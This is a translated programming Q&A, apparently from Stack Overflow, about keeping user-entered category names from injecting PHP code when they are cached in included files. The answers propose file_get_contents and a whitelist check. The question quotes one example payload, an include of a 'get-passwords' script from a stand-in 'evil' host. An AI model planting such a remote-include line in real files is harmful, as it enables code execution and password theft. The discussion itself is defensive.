Php。用戶可以在文件中寫入數據，並且包含文件

Question

用戶在mysql中寫入類別（name，url）。

在每次寫入/更改name和url時，我打算在服務器上寫入txt或php文件。針對每個頁面重新加載而不是連接到mysql，只是包含txt或php文件。

現在我想象一種情況。例如，用戶作爲name類別寫東西include("http://www.evil/get-passwords.php");因此，在txt或php文件中，我可能有這樣的代碼，當在PHP中包含的代碼將執行？

如何防止這種情況？只允許某些字符用於某個類別的名稱？

Answer 1

我不會推薦使用include來處理這種情況。您可以看看http://php.net/manual/en/function.file-get-contents.php

使用file_get_contents您可以避免腳本注入，因爲它將文件作爲純字符串讀取。

Answer 2

你打算讓用戶寫入.php文件嗎？這不是一個好主意。
如果你真的需要這個，讓他們寫在簡單的.txt文件（並仔細檢查，Apache不會解析txt爲php）。

對於消毒，共同apporach是寫一個允許列表（白名單）：

$allowedName = array(
     'name1', 
     'name2', 
     'name3' 
     // ... 
    ); 

然後，當用戶輸入您可以檢查：

if (!in_array($_POST['userName'], $allowedName)) 
    die('Not Allowed');